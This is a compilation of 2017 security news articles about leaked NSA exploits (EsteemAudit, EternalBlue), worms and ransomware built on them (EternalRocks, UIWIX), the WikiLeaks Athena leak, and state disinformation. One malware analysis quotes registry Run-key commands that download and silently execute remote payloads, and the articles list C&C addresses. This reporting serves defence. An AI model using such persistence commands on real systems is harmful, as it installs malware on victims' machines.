- BigBrothers -

Last update 09.10.2017 13:51:26

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8 



Researchers Release Patch for NSA-linked "EsteemAudit" Exploit

27.5.2017 securityweek BigBrothers
Security researchers at enSilo have released a patch to keep vulnerable systems protected from a recently released Windows exploit allegedly used by the National Security Agency (NSA)-linked Equation Group.

Dubbed EsteemAudit, this exploit targets a remote desktop protocol (RDP) bug and can be abused to move laterally within a compromised organization’s network, as well as to infect victims with ransomware or backdoors, or to exfiltrate sensitive information.

The exploit might not be as popular as the EternalBlue exploit, which fueled large infections such as WannaCry or Adylkuzz, but it could prove as devastating.

EsteemAudit was made public last month when the hacking group known as the Shadow Brokers decided to release a new set of exploits and tools allegedly stolen from the NSA-linked Equation Group last year. Soon after, Microsoft said the vulnerabilities had been patched in March.

The hackers initially put the tools up for auction, but decided to release some of them for free after failing to attract buyers. Last week, the Shadow Brokers announced plans to launch a subscription service and share more exploits to members for a monthly fee.

Unlike EternalBlue, which affects a variety of Windows versions, EsteemAudit only works on Windows XP and Windows Server 2003, which supposedly limits its overall impact. However, this also means that an official patch is unlikely to arrive from Microsoft, as it no longer offers support for these platform iterations.

Because of that, enSilo decided to release a persistent patch for these systems and keep users safe from attacks possibly leveraging the exploit. The decision was fueled by the fact that a large number of machines continue to use Windows XP and Server 2003, the researchers say.

“Upon login for each session, Windows will create a new instance of winlogon. The patch will be loaded into winlogon.exe (only if it is an RDP session) to perform in memory patching (hotpatching) of EsteemAudit. Any attempt to use EsteemAudit to infect the patched machine will inevitably fail,” enSilo explains.

Installing this patch, however, doesn’t render Windows XP or Server 2003 systems fully secure, as hundreds of other vulnerabilities impacting them still exist and will never be patched. This patch resolves only the vulnerability exploited by EsteemAudit and works on both x86 and x64 platform versions.

The patch is available for download on enSilo’s website and is installed by an installation program after accepting the terms of usage. Uninstallation is supported by signaling an event (which will remove the patch in memory) and unregistering the patch from loading into subsequent RDP sessions.

“The patch for Windows XP and Server 2003 supports silent installation and does not require a reboot, which helps users avoid the required downtime typically associated with patch installations. Upon patching, any attempt to use an EsteemAudit exploit to infect a patched machine will inevitably fail,” the researchers say.


G7 Demands Internet Giants Crack Down on Extremist Content

27.5.2017 securityweek BigBrothers
Taormina, Italy - The G7 nations on Friday demanded action from internet providers and social media firms against extremist content online, vowing to step up their fight against terrorism after the Manchester attack.

"The G7 calls for Communication Service Providers and social media companies to substantially increase their efforts to address terrorist content," Britain, the United States and their G7 partners said in a statement.

"We encourage industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence, and we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism," they said.

Elders at the Manchester mosque where the bomber sometimes worshipped have insisted that they preached a message of peace.

It has been suggested that he may well have been radicalized online by accessing content that is freely available from the likes of the Islamic State group.

"Make no mistake: the fight is moving from the battlefield to the internet," Prime Minister Theresa May told her G7 colleagues.

The G7 also vowed a collective effort to track down and prosecute foreign fighters dispersing from theaters of conflict such as Syria.

One prosecution was recently brought against such a fighter in Turkey, and Britain now wants help from local authorities for more prosecutions in Lebanon, Jordan and Iraq, a British government spokesperson said as the G7 countries met in Sicily.

The stepped-up cooperation comes amid fears that the Manchester bomber had been to Syria after visiting his parents' homeland of Libya.

"It is vital we do more to cooperate with our partners in the region to step up returns and prosecutions of foreign fighters," May said as she chaired a discussion on counter-terrorism in the Sicilian resort of Taormina.

"This means improving intelligence-sharing, evidence gathering and bolstering countries' police and legal processes."

European authorities are increasingly concerned about the threat posed by foreign fighters who went to join the Islamic State group but are now dispersing as the group comes under pressure on the battlefield.

According to a senior British government source, May urged the G7 countries to share police expertise and border security methods with countries where foreign fighters travel through or fight in.

Names and nationalities of foreign fighters should be shared to help their identification by different countries as they cross borders.

"When our allies find evidence, such as video or papers, of illegal activity involving foreign fighters, for example a Brit in a conflict zone, they should pass that to our authorities. It may help prosecute foreign fighters when they return," the source said.


Russia's Disinformation Efforts Hit 39 Countries: Researchers

26.5.2017 securityweek BigBrothers
Russia's campaign of cyberespionage and disinformation has targeted hundreds of individuals and organizations from at least 39 countries along with the United Nations and NATO, researchers said Thursday.

A report by the Citizen Lab at the University of Toronto revealed the existence of "a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society," lead researcher Ronald Deibert said.

The findings suggest that the cyber attacks on the 2016 presidential campaign of Hillary Clinton -- which US intelligence officials have attributed to Russia -- were just the tip of the iceberg.

Citizen Lab researchers said the espionage has targeted not only government, military and industry targets, but also journalists, academics, opposition figures, and activists,

Notable targets, according to the report, have included a former Russian prime minister, former high-ranking US officials, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers and chief executives of energy companies.

In a blog post, Deibert said the Russian-directed campaign follows a pattern of "phishing" attacks to obtain credentials of targets, and carefully "tainted" leaks that mix real and false information to create confusion around the true facts.

"Russia has a long history of experience with what is known as 'dezinformatsiya,' going back even to Soviet times," Deibert said.

"Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials -- 'falsehoods in a forest of facts'... is very difficult to distinguish and counter, especially when it is presented as a salacious 'leak' integrated with what otherwise would be private information."

Deibert said the researchers had no "smoking gun" that links the campaign to a particular government agency but added that "our report nonetheless provides clear evidence of overlap with what has been publicly reported by numerous industry and government reports about Russian cyber espionage."

Citizen Lab said one of the targets was US journalist David Satter, who has written extensively on corruption in Russia.

Satter's stolen e-mails were "selectively modified," and then "leaked" to give the false impression that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin, the report said.

Similar leak campaigns targeted officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam, according to the report.

UN officials and military personnel from more than a dozen countries were also targets, Citizen Lab said.

"Our hope is that in studying closely and publishing the details of such tainted leak operations, our report will help us better understand how to recognize and mitigate them," Deibert said.


NSA EsteemAudit exploit could trigger a new WannaCry-like attack
26.5.2017 securityaffairs BigBrothers

Security experts from enSilo firm released a free patch for Windows systems vulnerable to the NSA-linked ESTEEMAUDIT Exploit.
The WannaCry emergency could not be ended because the NSA dump leaked by the Shadow Brokers team included many other dangerous exploits.

Last months the Shadow Brokers group released another batch of data containing exploit codes still unpatched by Microsoft such as the “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan.”

The availability of such exploits and hacking tools represents a serious problem, an attacker with technical knowledge can exploit them to compromise millions of Windows systems across the world.

“Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk.” continues Microsoft.

Let’s start with the EsteemAudit exploit, it is a hacking tool that targets RDP service (port 3389) on machines running no longer supported Microsoft Windows Server 2003 / Windows XP.

It has been estimated that over 24,000 systems remain vulnerable to the EsteemAudit exploit.

“Even one infected machine opens your enterprise to greater exploitation,” explained the security researchers Omri Misgav and Tal Liberman who works for the Ensilo cyber security firm and that developed an unofficial patch for EsteemAudit exploit.

“In the trove of stolen exploits published by the Shadow Group appears ESTEEMAUDIT, an RDP exploit which can allow malware to move laterally within the organization, similar to what we had seen with WannaCry.” reads a blog post from Ensilo.

“enSilo is giving away its patch against ESTEEMAUDIT for free with the intention of helping organizations around the world to better improve their security posture in one easy, but critical step.

It is important to note that patching this exploit will not make these XP systems fully secure. There are still many unpatched vulnerabilities in Windows XP, and we urge organizations to update their systems accordingly.

Until that happens, we believe that in-the-wild critical exploits like ESTEEMAUDIT and ETERNALBLUE must be patched.”

Experts warn of possible exploitation of EsteemAudit exploit in network wormable threats. threat actors in the wild can develop malware that is able to propagate itself in target’s networks without user’s interaction.

“Years later, there continue to be hundreds of millions of machines relying on XP and Server 2003 operating systems in use around the world. Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today and the cybersecurity industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of global market share.” continues the blog post from Ensilo.

There are many malware in the wild that already infects systems using as attack vector the RDP protocol, (CrySiS, Dharma, and SamSam), the EsteemAudit exploit can potentially make these threats very aggressive and dangerous.

Users and enterprises running the vulnerable systems are advised to upgrade them to the higher versions to secure themselves from EsteenAudit attacks.
When it is impossible to upgrade the systems it is necessary to secure them, for example disabling RDP port or putting it behind the firewall.

You can also deploy the unofficial patch developed by Ensilo to secure your systems.


Expert founds EternalRocks, a malware that uses 7 NSA Hacking Tools
23.5.2017 securityaffairs BigBrothers

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.

Stampar discovered the EternalRocks after it infected his SMB honeypot, he called the malware ‘DoomsDayWorm.’

Follow
Miroslav Stampar @stamparm
If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95
3:44 AM - 18 May 2017
8 8 Retweets 9 9 likes
Twitter Ads info & Privacy
Stampar discovered that the EternalRocks disguises itself as WannaCry, but instead of delivering a ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.


Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)
5:28 PM - 17 May 2017
73 73 Retweets 87 87 likes
Twitter Ads info & Privacy
Follow
Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on https://github.com/stamparm/EternalRocks/ …. Will keep it updated, along with @_jsoo_
2:43 PM - 18 May 2017
Photo published for stamparm/EternalRocks
stamparm/EternalRocks
Contribute to EternalRocks development by creating an account on GitHub.
github.com
137 137 Retweets 136 136 likes
Twitter Ads info & Privacy
Unlike the WannaCry Ransomware that leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks exploits seven exploits leaked by Shadow Brokers and its code doesn’t include a kill-switch.

EternalRocks was developed to avoid detection and to remain undetectable on the target system, it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan
EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.

EternalRocks

Giving a close look at the list we can find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.

The DoublePulsar is the exploit used by malware to implement network worm capabilities, while the SMBTouch and ArchTouch are SMB reconnaissance tools, designed to scan for systems hacking open SMB ports exposed on the Internet.

The EternalRocks works in two stages:

During the first stage, EternalRocks downloads the Tor web browser on the affected computers, then it uses the application to connect to the command-and-control (C&C) server located on the Tor network.

After 24 hours, the second stage starts, the malware delays its action in the attempt to avoid sandboxing techniques.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages)TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).” wrote the researcher.

“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.“


EternalRocks Network Worm Leverages 7 NSA Hacking Tools

23.5.2017 securityweek BigBrothers
EternalRocks Worm Uses NSA Exploits to Compromise Systems and Install DoublePulsar Backdoor

A recently discovered network worm leverages a total of seven hacking tools stolen from the National Security Agency (NSA)-linked Equation Group.

Dubbed EternalRocks and capable of self-replication, the threat emerged over the past couple of weeks, with the most recent known sample dated May 3. The malware was discovered by security researcher Miroslav Stampar, who also found that the tool was initially called MicroBotMassiveNet.

The seven NSA hacking tools included in the network worm include the EternalBlue, EternalChampion, EternalRomance, and EternalSynergy exploits, along with the DoublePulsar backdoor and the Architouch, and Smbtouch SMB reconnaissance tools.

The exploits were made public in April by the hacker group going by the name of Shadow Brokers and are said to have been stolen from the NSA-linked threat actor Equation Group last year. Within days after the tools were released, Microsoft said that it had already patched the vulnerabilities targeted by the exploits with its March 2017 security updates.

However, because not all vulnerable devices have been patched, these exploits continue to be effective, and the recent WannaCry ransomware outbreak is the best example of that. The WannaCry malware abused the EternalBlue exploit for distribution, and other threats did the same, including the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

The EternalRocks worm is yet another malicious program attempting to cash in on the release of these exploits. Its purpose seems pretty straightforward: it compromises systems to install the DoublePulsar backdoor on them.

The worm uses a two-stage infection process to deliver its payload, but appears to be more of a research project at the moment than an actual malicious tool.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe and taskhost.exe. Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (command and control) communication requesting further instructions,” Stampar notes.

The second-stage payload is downloaded only after a 24-hour period has passed, and is hidden as the taskhost.exe process. The payload drops the exploit pack shadowbrokers.zip, unpacks contained directories payloads/, configs/ and bins/, and then starts a random scan of opened 445 (SMB) ports on the Internet.

EternalRocks also runs contained exploits (inside directory bins/) and pushes the first stage malware through payloads (inside directory payloads/). Moreover, the running Tor process continues to wait for further instructions from the C&C.

In an emailed comment, Michael Patterson, CEO of Plixer, told SecurityWeek that EternalRocks, currently the “first known malware incorporating all seven of the NSA hacking tools,” is clearly a more stealthy tool, given its delayed Tor communication and that administrators looking to keep their systems safe from this threat might have already lost the battle with it.

“Once a device is infected, applying a subsequent patch does not remove the malware. The most effective way for security teams to monitor for any infected devices is to leverage network traffic analytics to look for any historical Tor connections leaving the organization,” Patterson said.

“The race to detect and stop all malware was lost years ago. Organizations must constantly monitor their environments for anomalous behaviors, maintain a historical forensic database, and have a well-defined storage backup and recovery process for all critical data,” he concluded.


WikiLeaks Details Malware Made by CIA and U.S. Security Firm

22.5.2017 securityweek BigBrothers
WikiLeaks has published documents detailing another spy tool allegedly used by the U.S. Central Intelligence Agency (CIA). The latest files describe “Athena,” a piece of malware whose developers claim it works on all versions of Windows.

Documents apparently created between September 2015 and February 2016 describe Athena as an implant that can be used as a beacon and for loading various payloads into memory. The tool also allows its operator to plant and fetch files to or from a specified location on the compromised system.

A leaked diagram shows that Athena can be loaded onto the targeted computer by an asset, a remote operator, or via the supply chain. The implant is said to work on all versions of Windows from XP through 10, including Windows Server 2008 and 2012, on both x86 and x64 architectures.

While WikiLeaks has not made available the actual Athena tool, experts pointed out that the leaked documents include information on file and registry changes made by the implant, which can be useful for determining if a system has been compromised.

The documents also show that Athena was developed in collaboration with Siege Technologies, a U.S.-based company that provides offensive-driven cybersecurity solutions. The firm was acquired last year by Nehemiah Security.

WikiLeaks pointed to an email stolen from Italian spyware maker Hacking Team in which Siege Technologies founder Jason Syversen says he’s “more comfortable working on electronic warfare.”

Since March 8, when it first announced the Vault 7 files focusing on the CIA’s hacking capabilities, WikiLeaks has regularly published documents describing various implants allegedly used by the agency. The latest leaks have focused on Windows hacking tools, including for man-in-the-middle (MitM) attacks on the LAN, for hampering malware attribution and analysis, and creating custom malware installers.

Many of the tech companies whose tools are targeted by the Vault 7 exploits claimed their latest products are not affected. Only Cisco admitted finding a critical vulnerability that had exposed many of the company’s switches.

The Vault 7 files and the exploits leaked by the hacker group called Shadow Brokers, including ones used in the recent WannaCry ransomware attacks, have once again brought exploit stockpiling by governments into the spotlight.

“We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,” said Microsoft president and chief legal officer Brad Smith.

In response to concerns over the stockpiling of exploits, a group of U.S. lawmakers last week proposed a new bill, the “Protecting Our Ability to Counter Hacking Act of 2017” (PATCH Act), which aims to help find a balance between national security needs and public safety.


At least 3 different groups have been leveraging the NSA EternalBlue exploit, what’s went wrong?
22.5.2017 securityaffairs BigBrothers

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it such as the Adylkuzz botnet that is active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT didn’t show worm network worm capabilities like the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”

Once infected a system, the malicious code closes the port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The facts that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

EternalBlue SMB flaw

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.

In late April, The experts at Secdo also discovered another attack exploiting the EthernalBlue vulnerability, it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups have been leveraging the NSA exploit weeks before the WannaCry, this means a significant portion of the security community failed to monitor the threat or that failed to share the information about the attacks they have observed.

The success of EternalBlue attacks are the failure of our current model of cyber security.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

22.5.2017 securityweek BigBrothers
In the aftermath the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and terminate and/or delete various files or processes and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

A “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April,” the researchers say. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

As part of this attack, the researchers say, actors were using an EternalBlue-based worm to infect all machines in a compromised network, and were also deploying a backdoor for persistence, or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known root-kit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, United States Computer Emergency Readiness Team (US-CERT) issued an alert after Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows’ SMBv3 0-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially believed to be Critical.


More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry
20.5.2017 thehackernews BigBrothers

Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools – allegedly belonged to the NSA's elite hacking team Equation Group – several hacking groups and individual hackers have started using them in their own way.
The April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of Windows hacking tools, including dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers have identified multiple different campaigns exploiting Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide.
I have been even confirmed by multiple sources in hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks.
So, it would not be surprised to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals.

The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, "a backdoor may persist and compromised credentials may be used to regain access" to the affected systems.
Both campaigns are using a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then uses Eternalblue to infect other devices in the same network and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks

Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread began downloading multiple malicious modules and then access SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, "at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."
This attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet

This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But only instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on ‘Agony rootkit’ to make persistent.
Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine.
"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch," Secdo concluded.
"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."
These malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access.
The recent example is of "Adylkuzz," a recently-discovered stealthy cryptocurrency-mining malware that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks.
These attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month.
Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.


UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread
20.5.2017 securityaffairs BigBrothers
Security experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution
The effects of the militarization of the cyberspace are dangerous and unpredictable. A malicious code developed by a government could create serious problems for the Internet users, the recent WannaCry massive attack demonstrates it that used the EternalBlue Exploit to spread.

Now a new ransomware, dubbed UIWIX, was discovered to be using the NSA-linked EternalBlue exploit for distribution.

UIWIX is a fileless malware discovered by experts at Heimdal security early this week while investigating on WannaCry.

Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.

“As we feared in yesterday’s alert, another ransomware variant, known as Uiwix, has been spotted in the wild, exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.” reads the analysis published by Heimdal Security.

Malware researchers at Trend Micro also investigated the UIWIX and confirmed that UIWIX is a stealthier threat that is hard to analyze, it doesn’t write files on the infected machine and it is also able to detect the presence of a virtual machine (VM) or sandbox.

“So how is UIWIX different? It appears to be fileless: UIWIX is executed in memory after exploiting EternalBlue. Fileless infections don’t entail writing actual files/components to the computer’s disks, which greatly reduces its footprint and in turn makes detection trickier.” wrote Trend Micro.

“UIWIX is also stealthier, opting to terminate itself if it detects the presence of a virtual machine (VM) or sandbox. Based on UIWIX’s code strings, it appears to have routines capable of gathering the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.”

UIWIX is able to browser login, File Transfer Protocol (FTP), email, and messenger credentials from the infected system,

Unlike WannaCry, UIWIX leverages a Dynamic-link Library (DLL) to gain persistence.

Below a summary of WannaCry and UIWIX’s notable features reported by Trend Micro:

WannaCry UIWIX
Attack Vectors SMB vulnerabilities (MS17-010), TCP port 445 SMB vulnerabilities (MS17-010), TCP port 445
File Type Executable (EXE) Dynamic-link Library (DLL)
Appended extension {original filename}.WNCRY ._{unique id}.UIWIX
Autostart and persistence mechanisms Registry None
Anti-VM, VM check, or anti-sandbox routines None Checks presence of VM and sandbox-related files or folders
Network activity On the internet, scans for random IP addresses to check if it has an open port 445; connects to .onion site using Tor browser Uses mini-tor.dll to connect to .onion site
Exceptions (doesn’t execute if it detects certain system components) None Terminates itself if found running in Russia, Kazakhstan, and Belarus
Exclusions (directories or file types it doesn’t encrypt) Avoids encrypting files in certain directories Avoids encrypting files in two directories, and files with certain strings in their file name
Network scanning and propagation Yes (worm-like propagation) No
Kill switch Yes No
Autostart and persistence mechanisms Registry None
